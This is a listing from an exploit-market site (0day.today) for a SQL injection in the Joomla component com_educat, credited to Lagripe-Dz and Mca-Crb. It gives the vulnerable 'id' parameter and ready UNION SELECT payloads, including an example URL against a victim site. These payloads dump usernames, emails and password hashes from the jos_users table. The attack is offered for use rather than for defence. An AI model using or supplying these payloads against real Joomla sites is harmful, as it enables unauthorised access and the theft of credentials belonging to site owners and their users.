[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_educat SQL Injection Vulnerability

Author
Lagripe-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13483
Category
web applications
Date add
27-07-2010
Platform
php
=======================================================
Joomla Component com_educat SQL Injection Vulnerability
=======================================================


# Date: 26/07/2010
# Author : Lagripe-Dz & Mca-Crb
# Category: webapps/0day
# Tested on: [ win xp sp2 ]
# DORK : inurl:"No Dorks 4 Kids"
==========================================================
?
[+] Vulnerable File :
http://www.site.com/index.php?option=com_educat&controller=types&task=show&id=[SQL]
?
[+] ExploiT :
index.php?option=com_educat&controller=types&task=show&id=-115+Union+select+1,concat(username,0x3a,email),3,4,5,6,7,8,9,10,11+from+jos_users--
?
[+] Example :
http://www.victime.com/index.php?option=com_educat&controller=types&task=show&id=-115+Union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
?
======================================================================================
Greetz 2 :

k1nG_J0k3r , FliT0x-Dz , Forza-Dz , TXB9 , DZ-Z3RO ,Mr.Adel ,

IslamDzNet , WaZo , WolF-Dz & A11 "Dz" .. Contre A1-3atayin



#  0day.today [2024-12-25]  #